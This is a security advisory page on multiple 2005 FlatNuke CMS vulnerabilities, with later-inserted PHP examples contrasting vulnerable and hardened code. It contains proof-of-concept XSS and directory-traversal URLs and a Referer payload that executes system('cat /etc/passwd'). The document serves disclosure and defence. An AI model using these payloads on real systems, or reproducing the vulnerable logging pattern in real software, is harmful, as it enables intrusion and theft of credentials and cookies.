SecurityTracker.com
SecurityTracker Archives

Category:   Application (Forum/Board/Portal)  >   FlatNuke Vendors:   flatnuke.org
FlatNuke Referer Input Validation Hole Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1014114
SecurityTracker URL:  http://securitytracker.com/id/1014114
CVE Reference:   CVE-2005-1892, CVE-2005-1893, CVE-2005-1894, CVE-2005-1895, CVE-2005-1896
Updated:  Jun 9 2005
Original Entry Date:  Jun 6 2005
Impact:   Denial of service via network, Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.5.3; possibly earlier versions
Description:   SecWatch reported several vulnerabilities in FlatNuke. A remote user can cause a denial of service, execute arbitrary commands on the target system, conduct cross-site scripting attacks, view arbitrary image files, and determine the installation path.

A remote user can directly access the '/flatnuke/foot_news.php' script to cause the application to enter an infinite loop, consuming all available CPU resources.

A remote user can submit a request with a specially crafted HTTP Referer header that contains PHP code (sent raw rather than URL-encoded, so the PHP tags are written verbatim into the referer log) and then request 'flatnuke/misc/flatstat/referer.php' to cause the PHP code to be executed on the target system. The code, including operating system commands, will run with the privileges of the target web service. Some demonstration exploit code is available at:

http://secwatch.org/exploits/2005/06/flatnuke_shell.php.info

The '/forum/help.php' and '/forum/footer.php' scripts do not properly validate user-supplied input in the 'border' and 'back' parameters. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the FlatNuke software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/forum/help.php?border=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/forum/help.php?back=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/forum/footer.php?back=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/forum/footer.php?border=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

A remote user can request the 'thumb.php' script with a specially crafted 'image' parameter value to view arbitrary image files on the target system (via directory traversal) or to have the script fetch an image from an external site. A remote user can also determine the installation path via this script, and via certain other scripts when they are requested directly or with malformed parameters.

Some demonstration exploit URLs are provided:

Arbitrary image disclosure:

http://[target]/flatnuke/thumb.php?image=../../non-webreadable/private/image.jpg
http://[target]/flatnuke/thumb.php?image=http://[attacker]/image.jpg

Installation path disclosure:

http://[target]/flatnuke/thumb.php?image=null
http://[target]/flatnuke/index.php?mod=none_Search&find=1&where=null
http://[target]/flatnuke/print.php

The vendor was notified on June 4, 2005.

The vulnerability was discovered by an anonymous person and disclosed by SecWatch.

Impact:   A remote user can execute arbitrary commands on the target system with the privileges of the target web service.

A remote user can cause the target web service to consume all available CPU resources.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the FlatNuke software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can view arbitrary image files on the target system and can determine the installation path.

Solution:   The vendor has issued a fixed version (2.5.4), described at:

http://flatnuke.sourceforge.net/index.php?mod=read&id=1117979256

Vendor URL:  flatnuke.sourceforge.net/
Cause:   Access control error, Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  FlatNuke Remote Denial of Service, Arbitrary PHP Code Execution,


======================================================================

                       SecWatch 06/06/2005

   FlatNuke Remote Denial of Service, Arbitrary PHP Code Execution,
      Cross-Site Scripting and Path Disclosure Vulnerabilities

======================================================================
Table of Contents

Product Introduction.................................................1
Affected ............................................................2
Severity.............................................................3
Description of Vulnerability.........................................4
Proof of Concept.....................................................5
Solution.............................................................6
Time Line............................................................7
Credits..............................................................8

======================================================================
1) Introduction

Homepage: http://flatnuke.sourceforge.net/
Overview: FlatNuke is a CMS (Content Management System), utilising flat
files for information storage.
Advisory: http://secwatch.org/advisories/secwatch/20050604_flatnuke.txt
SWID: 1010779

References:
http://flatnuke.sourceforge.net/index.php?mod=read&id=1117979256

======================================================================
2) Affected

FlatNuke version 2.5.3.

Prior versions may also be affected.

======================================================================
3) Severity

Rating: Moderately - Highly critical
Impact: Denial of Service
        System access
        Cross Site Scripting
        Exposure of system information
        Manipulation of data
Where:  From remote
Action: Public disclosure

======================================================================
4) Description of Vulnerabilities

Multiple vulnerabilities in FlatNuke have been reported, which can be
exploited by remote users to trigger denial of service conditions, execute
arbitrary PHP code, conduct Cross-Site Scripting attacks and disclose
arbitrary images and system information.

If the "/flatnuke/foot_news.php" script is requested directly, a while()
loop that never terminates is entered, leading to full CPU utilisation of
the web server process.

HTTP Referer information is stored in "/misc/flatstat/referer.php". A
remote user can submit a specially crafted HTTP request with a
non-URL-encoded, spoofed Referer such as "http://[attacker]/?cmd=<?php
system("cat /etc/passwd")?>" and then directly access
"http://[target]/flatnuke/misc/flatstat/referer.php", where the stored PHP
code will be executed. The PHP code, including operating system commands,
will run with the privileges of the target web service.
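
The pattern described above (a request header appended verbatim to a file that the server later executes as PHP) and the direct-access problem behind the foot_news.php denial of service, as an added example that is not FlatNuke's code: the flatstat module's real source is not on this page, so the vulnerable logger is a reconstruction of the behaviour the advisory describes, and the file names, the FLATNUKE_ENTRY constant and the hardened design are assumptions.

```php
<?php
// Added example, not FlatNuke's code: a reconstruction of the referer-logging
// pattern the advisory describes, beside a hardened replacement. File names
// and the FLATNUKE_ENTRY constant are assumed.

/* 1) Vulnerable pattern (hypothetical). The raw Referer header is appended,
 *    unencoded, to a file whose .php extension makes the server execute it.
 *    Text outside <?php ... ?> tags is simply echoed, so a header such as
 *      Referer: http://attacker/?cmd=<?php system("cat /etc/passwd")?>
 *    becomes live code the next time referer.php is requested or included. */
function log_referer_vulnerable(string $phpLog): void
{
    $ref = $_SERVER['HTTP_REFERER'] ?? '';
    file_put_contents($phpLog, $ref . "\n", FILE_APPEND);
}

/* 2) Hardened pattern. Three independent controls:
 *    a) the log is a data file (JSON lines) outside the web root, never a
 *       file the interpreter or the web server will execute;
 *    b) the header must be an absolute http(s) URL built only from the
 *       RFC 3986 character set, so '<', '"' and whitespace are rejected;
 *    c) stored values are HTML-encoded whenever they are rendered. */
function validate_referer(string $ref): ?string
{
    if ($ref === '' || strlen($ref) > 2048) {
        return null;
    }
    // Unreserved + reserved + '%' from RFC 3986; '|' is used as delimiter
    // because it is not in the set.
    if (!preg_match('|^[A-Za-z0-9\-._~:/?#\[\]@!$&\'()*+,;=%]+\z|', $ref)) {
        return null;
    }
    if (filter_var($ref, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($ref, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $ref : null;
}

function log_referer_hardened(string $dataFile): bool
{
    $ref = validate_referer($_SERVER['HTTP_REFERER'] ?? '');
    if ($ref === null) {
        return false;                       // drop it, do not store it
    }
    $record = json_encode(['ts' => time(), 'ref' => $ref], JSON_UNESCAPED_SLASHES);
    return file_put_contents($dataFile, $record . "\n", FILE_APPEND | LOCK_EX) !== false;
}

function render_referers(string $dataFile): string
{
    $html  = '';
    $lines = is_file($dataFile)
        ? file($dataFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES)
        : [];
    foreach ($lines as $line) {
        $rec = json_decode($line, true);
        if (!is_array($rec) || !isset($rec['ref'])) {
            continue;
        }
        // Encode on output so a stored value can never become markup.
        $html .= '<li>' . htmlspecialchars($rec['ref'], ENT_QUOTES, 'UTF-8') . "</li>\n";
    }
    return $html;
}

/* 3) Scripts that are only meant to be include()d (foot_news.php in the DoS
 *    case, or any stats file) should refuse to run when requested directly.
 *    FLATNUKE_ENTRY is an assumed constant defined only by the real entry
 *    point (e.g. index.php) before it includes other scripts. */
function deny_direct_access(): void
{
    if (!defined('FLATNUKE_ENTRY')) {
        http_response_code(403);
        exit;
    }
}

// Demonstration with the advisory's payload (no web server needed).
$_SERVER['HTTP_REFERER'] = 'http://attacker/?cmd=<?php system("cat /etc/passwd")?>';
var_dump(validate_referer($_SERVER['HTTP_REFERER']));
var_dump(validate_referer('http://example.org/page?x=1'));
```

Run from the command line, the first var_dump prints NULL (the payload contains '<', '"' and a space, all outside the allow-list) and the second prints the URL unchanged. The decisive control is (a): even if validation were bypassed, a JSON line in a non-served data file is never parsed as PHP, whereas the vulnerable logger makes the web server the attacker's interpreter.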

User-supplied input passed to the "border" and "back" parameters in the
"/forum/help.php" and "/forum/footer.php" scripts is not correctly
sanitised. This can be exploited to execute arbitrary script code in the
security context of an affected website, as a result the code will be able
to access any of the target user's cookies, access data recently submitted
by the target user via web form to the site, or take actions on the site
acting as the target user.

Note: Successful exploitation requires that "register_globals" is enabled.
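
The injection exercised by the PoC URLs in this advisory (and described in the SecurityTracker summary above), together with the reason the register_globals note matters, as an added example that is not FlatNuke's code: the advisory does not show where help.php and footer.php echo 'border' and 'back', so the vulnerable function assumes they land in table attributes; the hardened function and its allow-lists are assumptions as well.

```php
<?php
// Added example, not FlatNuke's code: reconstructs the attribute-injection
// pattern described for forum/help.php and forum/footer.php, then a fix.

// Vulnerable (hypothetical): with register_globals=On, PHP creates $border
// and $back straight from the query string, and the script interpolates
// them into a tag without encoding. The PoC value  "><script>...</script>
// closes the attribute and the tag, so the script runs in the site's origin.
function table_open_vulnerable(string $border, string $back): string
{
    return "<table border=\"$border\" bgcolor=\"$back\">";
}

// Hardened: read input explicitly from $_GET (so the code works with
// register_globals off, which is also the setting to deploy), allow-list
// each value to the type it has to be, and still HTML-encode on output.
function table_open_hardened(array $get): string
{
    $border = filter_var(
        $get['border'] ?? 0,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0, 'max_range' => 10, 'default' => 0]]
    );
    $back = (string) ($get['back'] ?? '');
    if (!preg_match('/^#[0-9A-Fa-f]{6}$/', $back)) {
        $back = '#FFFFFF';                  // safe default, assumed colour format
    }
    $enc = function (string $s): string {
        return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
    };
    return '<table border="' . $enc((string) $border)
         . '" bgcolor="' . $enc($back) . '">';
}

// The payload from the advisory's PoC URLs, decoded as the server would.
$payload = urldecode('%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E');
echo table_open_vulnerable($payload, $payload), "\n";
echo table_open_hardened(['border' => $payload, 'back' => $payload]), "\n";
```

The first line of output carries the attribute closed early and a literal script element; in the second both parameters fail their allow-lists and the defaults are emitted. Encoding on output is kept even though the allow-lists already exclude '"' and '<', because the next developer to widen an allow-list should not also have to remember to add escaping.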

User-supplied input passed to the "image" parameter in the "thumb.php"
script is not correctly validated. This can be exploited to disclose
arbitrary images from local resources via directory traversal, to fetch
images from external resources, or to disclose the installation path.

It is also possible to disclose the installation path by accessing certain
scripts directly or by supplying specially formed parameters.
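
The validation the thumb.php PoCs (here and in the SecurityTracker summary above) call for, as an added example that is not FlatNuke's thumb.php: the image directory, the response handling and the exact checks are assumptions; the three cases covered are the ones the PoC URLs exercise, a traversal path, a remote URL, and a non-existent name that provokes a path-revealing PHP warning.

```php
<?php
// Added example, not FlatNuke's thumb.php: the input validation the PoCs
// above call for. Directory and parameter names are assumptions.

// Returns the absolute path of an image inside $imageDir, or null when the
// request names a URL, an absolute path, a traversal, or a non-image name.
function resolve_image(string $param, string $imageDir): ?string
{
    // Reject remote resources ("http://attacker/image.jpg") and absolute
    // paths explicitly, so the intent is visible to the reader.
    if ($param === ''
        || preg_match('#^[a-z][a-z0-9+.-]*://#i', $param)
        || $param[0] === '/' || $param[0] === '\\') {
        return null;
    }
    // Allow-list: exactly one path segment with an image extension. This
    // alone excludes '/', '\' and '..', i.e. the traversal PoC.
    if (!preg_match('/^[A-Za-z0-9_-]+\.(?:jpe?g|png|gif)$/', $param)) {
        return null;
    }
    // Defence in depth: canonicalise and confirm the result is still under
    // $imageDir (catches a symlink inside the directory pointing elsewhere).
    $base = realpath($imageDir);
    $full = realpath($imageDir . DIRECTORY_SEPARATOR . $param);
    if ($base === false || $full === false
        || strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $full;
}

// Entry point. display_errors=0 keeps PHP warnings, which carry the
// script's filesystem path, out of responses: probes such as image=null
// then receive a plain 404 instead of the installation path.
ini_set('display_errors', '0');
error_reporting(E_ALL);                     // still goes to the error log

$path = resolve_image((string) ($_GET['image'] ?? ''), __DIR__ . '/images');
if ($path === null || ($info = @getimagesize($path)) === false) {
    http_response_code(404);
    exit('not found');
}
header('Content-Type: ' . $info['mime']);
header('X-Content-Type-Options: nosniff');
readfile($path);
```

The allow-list is deliberately narrower than "anything without ../": a scheme check alone would still let `image=../../` through, and a traversal filter alone would still let `image=http://[attacker]/image.jpg` through when allow_url_fopen is on, so the name is constrained to what a thumbnail can legitimately be and everything else is refused before the filesystem is touched.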

======================================================================
5) Proof of Concept

Denial of Service:
http://[target]/flatnuke/foot_news.php

Arbitrary Command Execution PoC:
Demonstration exploit code has been released, available:
http://secwatch.org/exploits/2005/06/flatnuke_shell.php.info

Cross-Site Scripting:
http://[target]/forum/help.php?border=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/forum/help.php?back=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/forum/footer.php?back=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/forum/footer.php?border=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Information Disclosure:
http://[target]/flatnuke/index.php?mod=none_Search&find=1&where=null
http://[target]/flatnuke/print.php
http://[target]/flatnuke/thumb.php?image=null

Arbitrary Image Disclosure:
http://[target]/flatnuke/thumb.php?image=../../non-webreadable/private/image.jpg
http://[target]/flatnuke/thumb.php?image=http://[attacker]/image.jpg
http://[target]/flatnuke/thumb.php?image=null

======================================================================
6) Solution

The vulnerabilities have been resolved in FlatNuke version 2.5.4, available:
http://sourceforge.net/project/showfiles.php?group_id=93076&package_id=98622

Production systems should not display PHP errors to clients (display_errors
should be off); this also prevents the path disclosure triggered by the
information disclosure URLs above.

======================================================================
7) Time Line

03/06/2005 - Information reported to SecWatch.
04/06/2005 - Information validated by SecWatch.
             Vendor notified
05/06/2005 - Vendor responded promptly; new version (2.5.4) released
             resolving the issues.
             A safer referer logging method was suggested.
06/06/2005 - Public disclosure.

======================================================================
8) Credits
Discovered by an anonymous person, reported via SecWatch.


Copyright 2019, SecurityGlobal.net LLC